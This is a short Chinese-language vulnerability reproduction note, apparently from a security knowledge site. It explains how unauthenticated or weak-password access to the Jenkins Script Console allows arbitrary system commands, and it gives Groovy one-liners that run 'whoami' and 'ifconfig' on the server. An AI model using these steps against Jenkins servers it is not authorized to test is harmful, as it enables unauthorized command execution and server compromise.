menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Jenkins 功能未授权访问导致的远程命令执行漏洞 chevron_right Jenkins 功能未授权访问导致的远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Jenkins 功能未授权访问导致的远程命令执行漏洞.md
    1.38 KB / 2021-07-15 19:54:25
        Jenkins功能未授权访问导致的远程命令执行漏洞
    ===========================================
    
    一、漏洞简介
    ------------
    
    Jenkins管理登陆之后,后台"系统管理"功能,有个"脚本命令行的"功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,利用该功能,可以执行系统命令,该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在未授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    找到"系统管理"------"脚本命令行"。
    
    ![](./resource/Jenkins功能未授权访问导致的远程命令执行漏洞/media/rId24.png)
    
    ![](./resource/Jenkins功能未授权访问导致的远程命令执行漏洞/media/rId25.png)
    
    输入任意的Groovy脚本并在服务器上执行它。对于故障排除和诊断很有用。使用'println'命令查看输出(如果使用System.out,它将输出到服务器的标准输出,很难看到。)示例:
    
        println(Jenkins.instance.pluginManager.plugins)
    
    在脚本命令行中输入下面的语句,即可执行相应的命令:
    
        println "whoami".execute().text
    
    ![](./resource/Jenkins功能未授权访问导致的远程命令执行漏洞/media/rId26.png)
    
        println "ifconfig".execute().text
    
    image
    
    
    links
    file_download